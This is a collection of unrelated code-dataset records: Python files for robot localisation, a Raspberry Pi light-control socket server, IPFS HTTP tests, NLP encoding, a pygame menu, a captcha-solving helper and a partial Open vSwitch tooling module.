zero = uni.index(32)\r\n            zero = n-1-zero\r\n        else:\r\n            zero = -1\r\n        uni.reverse()\r\n        word = ''\r\n        for i in uni[zero+1:]:\r\n            word+=chr(i)\r\n        print (word)\r\n        words.append(word)\r\n    print(len(words))\r\n    print(sorted(set(words)) == sorted(words))\r\nimport time\r\nstart = time.time()\r\nmain(3)\r\nprint(time.time()-start)\r\n","sub_path":"brute_force2.0.py","file_name":"brute_force2.0.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"30641079","text":"import rosbag\nimport math\nimport tf\nimport time\nimport numpy as np\nimport rospy\nfrom visualization_msgs.msg import *\nfrom geometry_msgs.msg import *\n#from scipy.stats import norm\n\ndef discretize(x, y, heading):\n    row = (x / 20) + 1\n    col = (y / 20) + 1\n    theta = (heading / discreteSize) + 1\n    return int(row), int(col), int(theta)\n\n\ndef inverseDiscretize(X, Y, theta):\n    xc = X * 20\n    yc = Y * 20\n    tc = theta * discreteSize\n    return xc, yc, tc\n\n\ndef incorporateNoise(dPoint, mean, variance):\n    gauss = (1 / math.sqrt(2 * math.pi * (variance ** 2))) * math.exp(-((dPoint - mean) ** 2) / (2 * variance ** 2))\n    #gauss = norm.pdf(dPoint,mean,variance)\n    return gauss\n\n\ndef calculate_trajectory(x1, y1, theta1, x2, y2, theta2):\n    deltaTrans = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2) * 20\n    deltaTheta1 = math.degrees(math.atan2((y2 - y1), (x2 - x1))) - theta1\n    deltaTheta2 = theta2 - math.degrees(math.atan2((y2 - y1), (x2 - x1)))\n    return deltaTheta1, deltaTrans, deltaTheta2\n\n\nstartTime = time.time()\nrospy.init_node(\"estimation\",anonymous=True)\ngrid = rosbag.Bag('../grid.bag')\ngrid_data = grid.read_messages(topics=['Movements', 'Observations'])\nmodel_data = []\ndiscreteSize = 90 # Discretization size\ntags = [[125, 525], [125, 325], [125, 125], [425, 125], [425, 325], [425, 525]]\nstartPos = [12 * 20, 28 * 20, 200.52]\ncurrent_pose = [12, 28, int((200.52 / discreteSize) + 1)]\n\nprint(startPos)\nsamples = []\nfor data in grid_data:\n    samples.append(data)\n\nbelief = np.zeros((35, 35, 360 / discreteSize), dtype=np.float32)\nbelief[current_pose[0]-1, current_pose[1]-1, current_pose[2]-1] = 1.0\nfinal_points = []\n\n#Marker properties\nmarker_publisher = rospy.Publisher('line_marker', Marker, queue_size=100)\nline = Marker()\nline.header.frame_id = \"/base_link\"\nline.header.stamp = rospy.get_rostime()\nline.ns = \"line\"\nline.action = Marker.ADD\nline.pose.orientation.w = 1.0\nline.id = 1\nline.type = Marker.LINE_STRIP\nline.scale.x = 0.2\nline.color.b = 1.0\nline.color.a = 1.0\n\n\nfor sample in samples:\n    next_belief = np.zeros((35, 35, 360 / discreteSize), 
dtype=np.float32)\n if (sample[0] == \"Movements\"):\n\n rot1 = math.degrees(tf.transformations.euler_from_quaternion([sample[1].rotation1.x,\n sample[1].rotation1.y,\n sample[1].rotation1.z,\n sample[1].rotation1.w])[2])\n rot2 = math.degrees(tf.transformations.euler_from_quaternion([sample[1].rotation2.x,\n sample[1].rotation2.y,\n sample[1].rotation2.z,\n sample[1].rotation2.w])[2])\n translation = (sample[1].translation)*100\n # print(translation)\n #ang = startPos[2] + rot1\n\n #next_pose = discretize(startPos[0] + (translation * math.cos(ang)), startPos[1] + (translation * math.sin(ang)),startPos[2] + rot1 + rot2)\n # print(next_pose)\n\n for i in range(1, 36):\n for j in range(1, 36):\n for k in range(1, (360 / discreteSize)+1):\n prob = np.zeros((35, 35, 360 / discreteSize), dtype=np.float64)\n for l in range(1, 36):\n for m in range(1, 36):\n for n in range(1, (360 / discreteSize)+1):\n # print([i,j,k,l,m,n])\n theta1, trans, theta2 = calculate_trajectory(i, j, k*discreteSize, l, m, n*discreteSize)\n p1 = incorporateNoise(theta1, rot1, discreteSize / 2)\n p2 = incorporateNoise(trans, translation, 10)\n p3 = incorporateNoise(theta2, rot2, discreteSize / 2)\n prob[l - 1][m - 1][n - 1] = p1 * p2 * p3\n # new_belief = np.multiply(prob,belief)\n # summation = np.sum(new_belief)\n # next_belief[i-1][j-1][k-1] = summation\n next_belief[i - 1][j - 1][k - 1] = np.sum(np.multiply(prob, belief))\n belief = next_belief.copy()\n print(\"first max: \"+str(np.max(belief)))\n #a, b, c = np.where(belief == np.max(belief))\n else:\n range_var = (sample[1].range)*100\n bearing = tf.transformations.euler_from_quaternion([sample[1].bearing.x,\n sample[1].bearing.y,\n sample[1].bearing.z,\n sample[1].bearing.w])\n bearing = math.degrees(bearing[2])\n\n print(\"tag no: \" + str(sample[1].tagNum))\n landmark = tags[sample[1].tagNum]\n landmark = [int(landmark[0] /20) + 1, int(landmark[1] /20) + 1]\n for u in range(1, 36):\n for v in range(1, 36):\n for w in range(1, (360 / discreteSize)+1):\n delta_range = math.sqrt((landmark[0] - u) ** 2 + (landmark[1] - v) ** 2) * 20\n delta_bearing = math.degrees(math.atan2(landmark[1] - v , landmark[0] - u)) - (w * discreteSize)\n p11 = incorporateNoise(delta_range, range_var, 10)\n p22 = incorporateNoise(delta_bearing, bearing, discreteSize / 2)\n p12 = p11 * p22\n #print([delta_range,range_var])\n #print(landmark)\n #print tags[sample[1].tagNum]\n #print(belief[u-1][v-1][w-1])\n next_belief[u - 1][v - 1][w - 1] = p12 * belief[u - 1][v - 1][w - 1]\n # print(next_belief[u-1][v-1][w-1])\n print(\"Max: \"+str(np.max(next_belief)))\n belief = next_belief.copy()\n # belief = belief / np.sum(belief)\n belief = np.divide(belief, np.sum(belief))\n trajectory = np.unravel_index(belief.argmax(),np.shape(belief)) #np.where(belief == np.max(belief))\n print(\"Calculated pose: \" + str([trajectory[0]+1,trajectory[1]+1,trajectory[2]+1]))\n a = Point()\n a.x = (trajectory[0]+1)*0.20\n a.y = (trajectory[1]+1)*0.20\n a.z = 0\n line.points.append(a)\n marker_publisher.publish(line)\n final_points.append([trajectory[0], trajectory[1], trajectory[2]])\n\n\ntotalTime = time.time() - startTime\nprint(\"Total time: \" + str(totalTime / 60) + \" minutes\")\n","sub_path":"scripts/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"210014673","text":"tc = int(input())\nfor i in range(tc):\n output = ''\n f_text = input()\n s_text = input()\n\n for j in 
range(len(f_text)):\n        if f_text[j] == s_text[j]:\n            output += '.'\n        else:\n            output += '*'\n    \n    print(f_text)\n    print(s_text)\n    print(output,'\\n')\n","sub_path":"kattis/detailed_difference_s.py","file_name":"detailed_difference_s.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364535403","text":"import RPi.GPIO as GPIO\nfrom socket import *\nfrom select import *\n\nLIVING_ROOM = 17\nBATH_ROOM = 27\nINNER_ROOM = 22\n\nLIVING_ROOM_ON = '17100'\nLIVING_ROOM_OFF = '17101'\nBATH_ROOM_ON = '27100'\nBATH_ROOM_OFF = '27101'\nINNER_ROOM_ON = '22100'\nINNER_ROOM_OFF = '22101'\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LIVING_ROOM, GPIO.OUT)\nGPIO.setup(BATH_ROOM, GPIO.OUT)\nGPIO.setup(INNER_ROOM, GPIO.OUT)\nGPIO.setwarnings(False)\n\nHOST = '192.168.137.175'\nPORT = 10000\nBUF_SIZE = 512\nADDR = (HOST, PORT)\n\nserver_socket = socket(AF_INET, SOCK_STREAM)\nserver_socket.bind(ADDR)\nprint('bind')\n\nserver_socket.listen(1)\nprint('listen')\n\nclient_socket, addr_info = server_socket.accept()\nprint('accept')\n\n\nwhile True:\n\tdata = client_socket.recv(BUF_SIZE).decode()\n\tprint(data)\n\t\n\tif data == LIVING_ROOM_ON:\n\t\tGPIO.output(LIVING_ROOM, True)\n\telif data == LIVING_ROOM_OFF:\n\t\tGPIO.output(LIVING_ROOM, False)\n\telif data == BATH_ROOM_ON:\n\t\tGPIO.output(BATH_ROOM, True)\n\telif data == BATH_ROOM_OFF:\n\t\tGPIO.output(BATH_ROOM, False)\n\telif data == INNER_ROOM_ON:\n\t\tGPIO.output(INNER_ROOM, True)\n\telif data == INNER_ROOM_OFF:\n\t\tGPIO.output(INNER_ROOM, False)\n\telse:\n\t\tprint(\"Unsupported Command : {0}\".format(data))\n\n","sub_path":"ctrl_light/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460006595","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport unittest\n\n\nclass TestConfigure(unittest.TestCase):\n    def test_configure_output_options(self):\n        from azure.cli.core._output import AzOutputProducer\n        from azure.cli.core.mock import DummyCli\n        from azure.cli.command_modules.configure._consts import OUTPUT_LIST\n\n        output_producer = AzOutputProducer(DummyCli())\n        cli_output_options = set(output_producer._FORMAT_DICT.keys())\n        configure_output_options = set(item[\"name\"] for item in OUTPUT_LIST)\n\n        self.assertEqual(cli_output_options, configure_output_options,\n                         \"\\n{}'s output options: {}\\ndon't match az configure's output options ({}).\"\n                         .format(AzOutputProducer.__name__, cli_output_options, configure_output_options))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/tests/latest/test_configure.py","file_name":"test_configure.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120035068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 3 08:55:47 2015\n\n@author: 96isasva\n\"\"\"\nimport sys\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport model\n\n\n\nclass MyProgram(QMainWindow):\n    \n    def __init__(self, parent=None): \n        super(MyProgram, self).__init__()\n        self.setWindowTitle(\"MyProgram\")\n        self.initUI()\n    \n    def initUI(self):\n        self.frame = QWidget(self)\n        self.setCentralWidget(self.frame)\n    \n    def run(self):\n        self.show()\n        sys.exit(app.exec_())\n    \napp = QApplication(sys.argv)\nMyProgram().run()\n","sub_path":"exam1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375302454","text":"import unittest\nimport json\nimport requests\nfrom httmock import urlmatch, HTTMock\n\nimport ipfsApi.http\nimport ipfsApi.exceptions\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/okay')\ndef return_okay(url, request):\n    return {\n        'status_code': 200,\n        'content': 'okay'.encode('utf-8'),\n    }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/fail')\ndef return_fail(url, request):\n    return {\n        'status_code': 500,\n        'content': 'fail'.encode('utf-8'),\n    }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/apiokay')\ndef api_okay(url, request):\n    return {\n        'status_code': 200,\n        'content': json.dumps({\n            'Message': 'okay'}).encode('utf-8')\n    }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/apifail')\ndef api_fail(url, request):\n    return {\n        'status_code': 500,\n        'content': json.dumps({\n            'Message': 'Someone set us up the bomb'}).encode('utf-8')\n    }\n\n\nclass TestHttp(unittest.TestCase):\n    def setUp(self):\n        self.client = ipfsApi.http.HTTPClient(\n            'localhost',\n            5001,\n            'api/v0',\n            'json')\n\n    def test_successful_request(self):\n        with HTTMock(return_okay):\n            res = self.client.request('/okay')\n        self.assertEqual(res, 'okay')\n\n    def test_generic_failure(self):\n        with HTTMock(return_fail):\n            self.assertRaises(requests.HTTPError,\n                              self.client.request, '/fail')\n\n    def test_api_failure(self):\n        with HTTMock(api_fail):\n            self.assertRaises(ipfsApi.exceptions.ipfsApiError,\n                              self.client.request, '/apifail')\n\n    def test_session(self):\n        with HTTMock(return_okay):\n            with self.client.session():\n                res = self.client.request('/okay')\n            self.assertEqual(res, 
'okay')\n\n def test_explicit_decoder(self):\n with HTTMock(api_okay):\n res = self.client.request('/apiokay',\n decoder='json')\n self.assertEquals(res['Message'], 'okay')\n","sub_path":"test/unit/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498608176","text":"import sys\nimport cPickle\nfrom collections import defaultdict\n\nif len(sys.argv)>1:\n target1=sys.argv[1]\nelse:\n target1 = 'F'\n\ndef mean(l):\n return sum(l)*1.0/len(l)\ndef tval(c):\n return ord(c)-65\ndef carval(v):\n if v=='':\n return (0,1)\n else:\n return (ord(v)-ord('a')+1,0)\ndef rfx(v):\n if v=='NA':\n return (0,1)\n else:\n return (v,0)\n\nf=open('predG.csv')\npredg={}\nfor l in f:\n id,p=l.rstrip().split(',')\n predg[int(id)]=float(p)\n\nlevels = { 'A':set(),'B':set(),'C':set(),'D':set(),'E':set(),'F':set(),'G':set() }\n\nlast = {}\nans = {}\nca = {}\ncostlvl = {}\ncostdir = {}\nfreq={}\ngs={}\nho={}\nca={}\ndp={}\nmc={}\nao={}\nad={}\ncv={}\ncvm={}\nrf={}\nrfm={}\ncp={}\nhist={}\ncpm={}\ndp={}\ndpm={}\nstate={}\nprior={}\nlcost={}\nuniq={}\nstates = set()\nfor col in ('A','B','C','D','E','F','G'):\n prior[col]=defaultdict(int)\ntcost=0\nccost=0\nday={}\nhour={}\nquotes = defaultdict(int)\nf=open('trains1.csv','r')\nh=f.readline()\nfor l in f:\n a=l.rstrip().split(',')\n id=a[0]\n rt=a[2]\n\n cs=float(a[24])\n if rt=='1':\n ans[id] = a[17:24]\n for col in ('A','B','C','D','E','F','G'):\n val = a[ord(col)-48]\n levels[col].add(val)\n tcost = 0\n ccost = 0\n else:\n gs[id]=a[7]\n ho[id]=a[8]\n ca[id]=a[9]\n dp[id]=a[16]\n mc[id]=a[14]\n ao[id]=a[12]\n cv[id],cvm[id] = carval(a[10])\n rf[id],rfm[id] = rfx(a[11])\n cp[id],cpm[id] = rfx(a[15])\n dp[id],dpm[id] = rfx(a[16])\n day[id]=a[3]\n hour[id]=a[4].split(':')[0]\n states.add(a[5])\n state[id]=a[5]\n ad[id]=int(a[12])-int(a[13])\n quotes[id] += 1\n if tcost > 0:\n costdir[id] = cs / (tcost/ccost)\n tcost += cs\n ccost += 1\n costlvl[id] = tcost / ccost\n if id not in freq:\n freq[id] = {}\n lcost[id] = {}\n hist[id] = {}\n uniq[id] = {}\n for col in ('A','B','C','D','E','F','G'):\n uniq[id][col] = set()\n freq[id][col] = defaultdict(int)\n lcost[id][col]=defaultdict(int)\n hist[id][col]=defaultdict(int)\n for col in ('A','B','C','D','E','F','G'):\n uniq[id][col].add(a[ord(col)-48])\n freq[id][col][a[ord(col)-48]] += 1\n lcost[id][col][a[ord(col)-48]] += cs\n prior[col][a[ord(col)-48]] += 1\n if id in last and a[ord(col)-48] == last[id][ord(col)-65]:\n hist[id][col] += 1\n else:\n hist[id][col]=1\n last[id] = a[17:24]\n\nf=open('train9'+target1+'.csv','w')\nf.write('id,y,ls,ans,last,rest')\nfor col in ('A','B','C','D','E','F','G'):\n for lvl in sorted(list(levels[col])):\n f.write(',last'+col+lvl)\nfor lvl in sorted(list(levels[target1])):\n f.write(',freq'+target1+lvl)\nfor col in ('A','B','C','D','E','F','G'):\n f.write(',hist'+col)\nfor col in ('A','B','C','D','E','F','G'):\n f.write(',uniq'+col)\nf.write(',gs')\nf.write(',ho')\nf.write(',ca')\nf.write(',dp')\nf.write(',mc')\nf.write(',ao')\nf.write(',ad')\nf.write(',costlvl')\nf.write(',costdir')\nf.write(',quotes')\nf.write(',day5')\nf.write(',day6')\nf.write(',hour')\nf.write(',cv')\nf.write(',cvm')\nf.write(',rf')\nf.write(',rfm')\nf.write(',cp')\nf.write(',cpm')\nf.write(',dp')\nf.write(',dpm')\nf.write(',predg')\nfor st in sorted(list(states)):\n f.write(',%s' % st)\n#f.write(',csrt1')\n#f.write(',csrt2')\nf.write('\\n')\nfor id in ans.keys():\n rest = 1\n for col in 
('A','B','C','D','E','F','G'):\n if col!=target1 and ans[id][tval(col)]!=last[id][tval(col)]:\n rest = 0\n f.write('%s,%s,%s,%s,%s,%d' % (id,ans[id][tval(target1)],last[id][tval(target1)],''.join(ans[id]),''.join(last[id]),rest))\n for col in ('A','B','C','D','E','F','G'):\n for lvl in sorted(list(levels[col])):\n f.write(',%d' % int(last[id][tval(col)]==lvl))\n for lvl in sorted(list(levels[target1])):\n f.write(',%d' % freq[id][target1][lvl])\n for col in ('A','B','C','D','E','F','G'):\n f.write(',%d' % hist[id][col])\n for col in ('A','B','C','D','E','F','G'):\n f.write(',%d' % len(uniq[id][col]))\n f.write(',%s' % gs[id])\n f.write(',%s' % ho[id])\n f.write(',%s' % ca[id])\n f.write(',%s' % dp[id])\n f.write(',%s' % mc[id])\n f.write(',%s' % ao[id])\n f.write(',%s' % ad[id])\n f.write(',%f' % costlvl[id])\n f.write(',%f' % costdir[id])\n f.write(',%d' % quotes[id])\n f.write(',%d' % int(day[id]=='5'))\n f.write(',%d' % int(day[id]=='6'))\n f.write(',%s' % hour[id])\n f.write(',%s' % cv[id])\n f.write(',%s' % cvm[id])\n f.write(',%s' % rf[id])\n f.write(',%s' % rfm[id])\n f.write(',%s' % cp[id])\n f.write(',%s' % cpm[id])\n f.write(',%s' % dp[id])\n f.write(',%s' % dpm[id])\n f.write(',%s' % predg[int(id)])\n for st in sorted(list(states)):\n f.write(',%d' % int(state[id]==st))\n# c1 = 0\n# c2 = 0\n# t1 = 0\n# t2 = 0\n# for k,v in lcost[id][target1].items():\n# if k==last[id][tval(target1)]:\n# c1 += v\n# t1 += 1\n# t1 += freq[id][target1][k]\n# else:\n# c2 += v\n# t2 += 1\n# t2 += freq[id][target1][k]\n# if c2==0:\n# c2=c1\n# t2=t1\n# f.write(',%f' % ((c1*1.0/t1)/(c2*1.0/t2)))\n# c1 = 0\n# c2 = 0\n# t1 = 0\n# t2 = 0\n# for k,v in lcost[id][target2].items():\n# if k==last[id][tval(target2)]:\n# c1 += v\n# t1 += freq[id][target2][k]\n# else:\n# c2 += v\n# t2 += freq[id][target2][k]\n# if c2==0:\n# c2=c1\n# t2=t1\n# f.write(',%f' % ((c1*1.0/t1)/(c2*1.0/t2),))\n f.write('\\n')\n","sub_path":"pp/flatten9.py","file_name":"flatten9.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"197113226","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 20 14:59:19 2019\n\n@author: leguillou\n\"\"\"\n\nimport argparse \nimport sys, os\nimport numpy as np \nfrom scipy import interpolate\nimport pickle\n\ndef compute_mean_rmse(rmse, prods, name):\n \n mean_rmse = [] \n rmse_data = rmse['RMSE']\n for prod in prods:\n mean_rmse.append(np.mean(rmse_data[name][prod]))\n \n return mean_rmse\n\ndef compute_eff_res(spec, prods, name, r=0.5):\n \n eff_res = []\n wavenumber = spec['wavenumber'] *1e3 # in cycle/km\n recScore_data = spec['recScore']\n for prod in prods:\n f = interpolate.interp1d(recScore_data[name][prod], 1/wavenumber, axis=0) \n eff_res.append(f(r))\n \n return eff_res\n\ndef write_outputs(file,mean_rmse_duacs,mean_rmse_da,eff_res_duacs,eff_res_da, prods):\n f = open(file,'w')\n # DUACS\n if mean_rmse_duacs is not None and eff_res_duacs is not None:\n f.write('DUACS\\n')\n f.write('\\t RMSE:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(mean_rmse_duacs[i]) + '\\n') \n f.write('\\t Eff Res:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(eff_res_duacs[i]) + '\\n') \n # DA\n f.write('\\nDA\\n')\n f.write('\\t RMSE:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(mean_rmse_da[i]) + '\\n') \n f.write('\\t Eff Res:\\n' )\n for i,prod in 
enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(eff_res_da[i]) + '\\n') \n \n\n##======================================================================================================================##\n## MAIN ##\n##======================================================================================================================##\n\nif __name__ == '__main__':\n #+++++++++++++++++++++++++++++++#\n # _#\n #+++++++++++++++++++++++++++++++#\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--path_config_exp', default=None, type=str) # parameters relative to the DA experiment\n parser.add_argument('--name_config_comp', default=None, type=str) # parameters relative to NATL60 and DUACS \n parser.add_argument('--prods', default=['ssh'],nargs='+', type=str)\n parser.add_argument('--overwrite', default=1, type=int)\n opts = parser.parse_args()\n \n #+++++++++++++++++++++++++++++++#\n # GET params #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Get parameters')\n # parameters relative to the DA experiment\n dir_exp = os.path.dirname(opts.path_config_exp)\n name_exp = os.path.basename(opts.path_config_exp)\n sys.path.insert(0,dir_exp)\n exp = __import__(name_exp, globals=globals())\n # parameters relative to NATL60 and DUACS \n sys.path.insert(0,os.path.join(os.path.dirname(__file__), \"configs\"))\n comp = __import__(opts.name_config_comp, globals=globals())\n \n #+++++++++++++++++++++++++++++++#\n # Diagnostics #\n #+++++++++++++++++++++++++++++++#\n file_inputs = comp.path_out+exp.name_experiment +'/analysis.pic'\n file_outputs = comp.path_out+exp.name_experiment +'/diags.txt'\n if os.path.isfile(file_outputs) and opts.overwrite!=1: \n print(file_outputs, 'already exists')\n else:\n if opts.overwrite==1: \n print('Warning:', file_outputs, 'already exists but you ask to overwrite it')\n # DUACS\n if hasattr(comp, 'path_duacs'):\n DUACS = True\n else:\n print('No DUACS-related parameters --> no diagnostics will be computed')\n DUACS = False\n #+++++++++++++++++++++++++++++++#\n # Read analysis #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Read Analysis') \n with open(file_inputs, 'rb') as f:\n spec, rmse = pickle.load(f)\n \n #+++++++++++++++++++++++++++++++#\n # Evaluate metrics #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Evaluate metrics ')\n mean_rmse_da = compute_mean_rmse(rmse, opts.prods, name='da')\n eff_res_da = compute_eff_res(spec, opts.prods, name='da')\n if DUACS:\n mean_rmse_duacs = compute_mean_rmse(rmse, opts.prods, name='duacs')\n eff_res_duacs = compute_eff_res(spec, opts.prods, name='duacs')\n else:\n mean_rmse_duacs = eff_res_duacs = None\n \n #+++++++++++++++++++++++++++++++#\n # Write outputs #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Write outputs ')\n print(file_outputs)\n write_outputs(file_outputs, mean_rmse_duacs,mean_rmse_da,eff_res_duacs,eff_res_da, opts.prods)\n \n\n \n \n","sub_path":"diags.py","file_name":"diags.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448021372","text":"# -*- coding: utf-8 -*-\n\nfrom requests import post\nfrom .consts import urls\n\n\n# map items, for example: '5' --> (2, 1) --> (105, 35)\ndef map_items(items):\n cors = []\n for item in items:\n item = int(item)\n m, d = item%4, item//4\n x = 4 if m == 0 else m\n y = d if m == 0 else d + 1\n cors = cors + [(p-1)*70 + 35 for p in [x, y]]\n return cors\n\n# verifying captcha\ndef 
verify_captcha_auto(captcha_img_path):\n url = urls['punch_captcha']\n files = {'file': open(captcha_img_path, 'rb')}\n try:\n res = post(url, files=files, timeout=5)\n items = res.text.split('')[1].split('<')[0].split(' ')\n return ','.join([str(i) for i in map_items(items)])\n except:\n return False\n\n# verify captcha by hand .. 对深度学习还不熟悉, 想哭\ndef verify_captcha_byhand(captcha_img_path):\n from PIL import Image\n import matplotlib.pyplot as plt\n img = Image.open(captcha_img_path)\n plt.figure(\"verify and answer, separated answer(the index of captcha: 1-8) with ','\")\n plt.imshow(img)\n plt.show()\n nums = input('captcha id: ')\n items = nums.split(',')\n return ','.join([str(i) for i in map_items(items)])\n\n# verify captcha\ndef verify_captcha(captcha_path):\n return verify_captcha_auto(captcha_path) or verify_captcha_byhand(captcha_path)\n\n","sub_path":"booker/verify_captcha.py","file_name":"verify_captcha.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48894153","text":"# This file is adapted from from May et al. 2019: \"On Measuring Bias in Sentence Encoders\"\n# File: https://github.com/W4ngatang/sent-bias/blob/master/sentbias/encoders/bert.py\n\n\nimport torch\nimport pytorch_pretrained_bert as bert\nfrom transformers import AutoTokenizer\n\n\nMODELS = {\n 'bert': [\n 'bert-base-german-cased',\n 'bert-base-german-dbmdz-cased',\n 'bert-base-german-dbmdz-uncased',\n 'distilbert-base-german-cased'\n ],\n 'xlm': [\n 'xlm-mlm-ende-1024',\n 'xlm-clm-ende-1024'\n ]\n}\n\n\nTOKENIZERS = {\n 'deepset': 'bert-base-german-cased',\n 'dbmdz': 'bert-base-german-dbmdz-cased'\n}\n\n\ndef load_tokenizer(version):\n return AutoTokenizer.from_pretrained(TOKENIZERS[version])\n\n\ndef load_model(version):\n \"\"\"Load BERT model and corresponding tokenizer.\"\"\"\n tokenizer = bert.BertTokenizer.from_pretrained(version)\n model = bert.BertModel.from_pretrained(version)\n model.eval()\n return model, tokenizer\n\n\ndef encode(model, tokenizer, texts):\n \"\"\"Use tokenizer and model to encode texts.\"\"\"\n encs = {}\n for text in texts:\n tokenized = tokenizer.tokenize(text)\n indexed = tokenizer.convert_tokens_to_ids(tokenized)\n segment_idxs = [0] * len(tokenized)\n tokens_tensor = torch.tensor([indexed])\n segments_tensor = torch.tensor([segment_idxs])\n enc, _ = model(tokens_tensor, segments_tensor, output_all_encoded_layers=False)\n\n enc = enc[:, 0, :] # extract the last rep of the first input\n encs[text] = enc.detach().view(-1).numpy()\n return encs\n","sub_path":"bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191379922","text":"import pygame\nimport sys\nfrom main_menu.button import Boton\n\npygame.init()\n\"\"\"\nMenú principal\n\"\"\"\n\n\nW, H = 800, 500#Dimensiones de la ventana\n\nclass Menu_principal:\n\n\n def __init__(self):\n self.bg = pygame.image.load('BG.jpg')\n self.bg = pygame.transform.scale(self.bg, (W, H))\n self.comenzar = True#Comienza en el menú principal y lo matiene \n self.play = Boton(150, 200, 200, 200)#Botón de play\n self.exit = Boton(350, 200, 200, 200)#Botón de exit\n self.exit.img = pygame.image.load('buttons/exit.png')#Cambiar la imagen predeterminada por la del botón de exit\n\n\n def run(self):\n screen = pygame.display.set_mode((W, H))#Dimensiones de pantalla config\n font = pygame.font.SysFont(\"arial\", 50, italic=40)#Estilo 
y tamaño de texto\n main_text = font.render(\"Click on play for start\", True, (58, 238, 235))#Texto principal\n \n while self.comenzar:\n clock = int(pygame.time.get_ticks()/1000)#Segundos para hacer parpadear el texto\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n #Si se clickea en el botón de play con el click derecho del mouse comenzar el juego\n if self.play.rect.collidepoint(event.pos):\n self.comenzar = False\n #Si se clickea en el botón de exit con el click derecho del mouse cerrar la ventana\n if self.exit.rect.collidepoint(event.pos):\n sys.exit()\n pygame.quit()\n \n screen.blit(self.bg, (0, 0))#Background para el menú principal\n #Mostrar el titulo cada 2 segundos\n if clock % 2 == 0:\n screen.blit(main_text, (160, 100))\n self.play.draw(screen)#Dibuja el botón de play en la pantalla\n self.exit.draw(screen)#Dibuja el botón de exit en la pantalla\n pygame.display.update()\n \n\n \n","sub_path":"main_menu/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4443109","text":"import os\nimport json\nimport subprocess\nimport logging\nimport threading\nimport struct, socket\nimport time, random, string\nimport logicalview as lgview\nfrom pyDatalog import pyDatalog\nfrom onexit import on_parent_exit\nfrom tp_utils.run_env import is_gateway_chassis, get_extra\n\nlogger = logging.getLogger(__name__)\nflow_lock = threading.Lock()\nTP_TUNNEL_PORT_NAME_PREFIX = \"tupleNet-\"\n# In OpenFlow 1.0 and 1.1, re-adding a flow always resets the\n# flow's packet and byte counters to 0.\nOPENFLOW_VER = \"OpenFlow12\"\n\nclass OVSToolErr(Exception):\n pass\n\ndef call_popen(cmd, commu=None, shell=False):\n child = subprocess.Popen(cmd, shell=shell, stdout=subprocess.PIPE,\n stdin=subprocess.PIPE, stderr=subprocess.PIPE)\n if commu is None:\n output = child.communicate()\n else:\n output = child.communicate(commu)\n if child.returncode:\n raise RuntimeError(\"error executing %s\" % (' '.join(cmd)))\n if len(output) == 0 or output[0] is None:\n output = \"\"\n else:\n output = output[0].decode(\"utf8\").strip()\n return output\n\ndef call_ovsprog(prog, args_list, commu=None):\n cmd = [prog, \"--timeout=5\"] + args_list\n retry_n = 0\n while True:\n try:\n return call_popen(cmd, commu)\n except Exception as err:\n retry_n += 1\n if retry_n == 3:\n raise err\n continue\n\ndef ovs_ofctl(*args):\n return call_ovsprog(\"ovs-ofctl\", 